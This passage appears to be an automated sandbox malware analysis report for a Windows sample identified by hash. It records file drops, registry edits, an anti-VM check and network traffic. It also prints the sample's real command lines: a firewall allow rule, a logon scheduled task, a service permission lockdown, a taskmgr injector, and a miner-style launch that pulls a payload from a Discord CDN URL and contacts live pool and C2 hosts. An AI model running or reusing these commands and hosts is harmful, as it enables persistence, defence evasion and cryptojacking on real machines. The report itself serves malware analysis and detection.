| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-162 = "Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe
"C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4fd84729-fedd-4a9e-b50a-5a6b58ae20c0.uuid.localstats.org | udp |
| US | 8.8.8.8:53 | server8.localstats.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun4.l.google.com | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 74.125.250.129:19302 | stun4.l.google.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| BG | 185.82.216.111:443 | server8.localstats.org | tcp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| CZ | 46.8.8.100:443 | | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| DE | 81.3.27.44:3478 | stun.ipfire.org | udp |
| US | 8.8.8.8:53 | snickerfool.com | udp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| NL | 80.79.4.25:80 | snickerfool.com | tcp |
| US | 8.8.8.8:53 | 44.27.3.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.4.79.80.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | | tcp |
| N/A | 10.127.0.55:445 | | tcp |
| N/A | 10.127.0.45:445 | | tcp |
| N/A | 10.127.0.26:445 | | tcp |
| N/A | 10.127.0.20:445 | | tcp |
| N/A | 10.127.0.37:445 | | tcp |
| N/A | 10.127.0.58:445 | | tcp |
| N/A | 10.127.0.7:445 | | tcp |
| N/A | 10.127.0.41:445 | | tcp |
| N/A | 10.127.0.59:445 | | tcp |
| N/A | 10.127.0.15:445 | | tcp |
| N/A | 10.127.0.62:445 | | tcp |
| N/A | 10.127.0.6:445 | | tcp |
| N/A | 10.127.0.51:445 | | tcp |
| N/A | 10.127.0.24:445 | | tcp |
| N/A | 10.127.0.31:445 | | tcp |
| N/A | 10.127.0.43:445 | | tcp |
| N/A | 10.127.0.54:445 | | tcp |
| N/A | 10.127.0.32:445 | | tcp |
| N/A | 10.127.0.19:445 | | tcp |
| N/A | 10.127.0.25:445 | | tcp |
| N/A | 10.127.0.4:445 | | tcp |
| N/A | 10.127.0.12:445 | | tcp |
| N/A | 10.127.0.3:445 | | tcp |
| N/A | 10.127.0.14:445 | | tcp |
| N/A | 10.127.0.38:445 | | tcp |
| N/A | 10.127.0.60:445 | | tcp |
| N/A | 10.127.0.34:445 | | tcp |
| N/A | 10.127.0.10:445 | | tcp |
| N/A | 10.127.0.40:445 | | tcp |
| N/A | 10.127.0.36:445 | | tcp |
| N/A | 10.127.0.5:445 | | tcp |
| N/A | 10.127.0.30:445 | | tcp |
| N/A | 10.127.0.28:445 | | tcp |
| N/A | 10.127.0.49:445 | | tcp |
| N/A | 10.127.0.46:445 | | tcp |
| N/A | 10.127.0.33:445 | | tcp |
| N/A | 10.127.0.50:445 | | tcp |
| N/A | 10.127.0.16:445 | | tcp |
| N/A | 10.127.0.44:445 | | tcp |
| N/A | 10.127.0.52:445 | | tcp |
| N/A | 10.127.0.9:445 | | tcp |
| N/A | 10.127.0.53:445 | | tcp |
| N/A | 10.127.0.21:445 | | tcp |
| N/A | 10.127.0.2:445 | | tcp |
| N/A | 10.127.0.39:445 | | tcp |
| N/A | 10.127.0.27:445 | | tcp |
| N/A | 10.127.0.13:445 | | tcp |
| N/A | 10.127.0.57:445 | | tcp |
| N/A | 10.127.0.61:445 | | tcp |
| N/A | 10.127.0.22:445 | | tcp |
| N/A | 10.127.0.35:445 | | tcp |
| N/A | 10.127.0.18:445 | | tcp |
| N/A | 10.127.0.11:445 | | tcp |
| N/A | 10.127.0.17:445 | | tcp |
| N/A | 10.127.0.8:445 | | tcp |
| N/A | 10.127.0.63:445 | | tcp |
| N/A | 10.127.0.0:445 | | tcp |
| N/A | 10.127.0.47:445 | | tcp |
| N/A | 10.127.0.48:445 | | tcp |
| N/A | 10.127.0.29:445 | | tcp |
| N/A | 10.127.0.56:445 | | tcp |
| N/A | 10.127.0.23:445 | | tcp |
| N/A | 10.127.0.42:445 | | tcp |
| N/A | 10.127.0.64:445 | | tcp |
| N/A | 10.127.0.88:445 | | tcp |
| N/A | 10.127.0.119:445 | | tcp |
| N/A | 10.127.0.121:445 | | tcp |
| N/A | 10.127.0.80:445 | | tcp |
| N/A | 10.127.0.102:445 | | tcp |
| N/A | 10.127.0.126:445 | | tcp |
| N/A | 10.127.0.96:445 | | tcp |
| N/A | 10.127.0.122:445 | | tcp |
| N/A | 10.127.0.108:445 | | tcp |
| N/A | 10.127.0.111:445 | | tcp |
| N/A | 10.127.0.97:445 | | tcp |
| N/A | 10.127.0.85:445 | | tcp |
| N/A | 10.127.0.72:445 | | tcp |
| N/A | 10.127.0.74:445 | | tcp |
| N/A | 10.127.0.103:445 | | tcp |
| N/A | 10.127.0.114:445 | | tcp |
| N/A | 10.127.0.78:445 | | tcp |
| N/A | 10.127.0.81:445 | | tcp |
| N/A | 10.127.0.112:445 | | tcp |
| N/A | 10.127.0.95:445 | | tcp |
| N/A | 10.127.0.107:445 | | tcp |
| N/A | 10.127.0.127:445 | | tcp |
| N/A | 10.127.0.73:445 | | tcp |
| N/A | 10.127.0.110:445 | | tcp |
| N/A | 10.127.0.68:445 | | tcp |
| N/A | 10.127.0.91:445 | | tcp |
| N/A | 10.127.0.124:445 | | tcp |
| N/A | 10.127.0.70:445 | | tcp |
| N/A | 10.127.0.123:445 | | tcp |
| N/A | 10.127.0.120:445 | | tcp |
| N/A | 10.127.0.115:445 | | tcp |
| N/A | 10.127.0.89:445 | | tcp |
| N/A | 10.127.0.125:445 | | tcp |
| N/A | 10.127.0.113:445 | | tcp |
| N/A | 10.127.0.75:445 | | tcp |
| N/A | 10.127.0.101:445 | | tcp |
| N/A | 10.127.0.82:445 | | tcp |
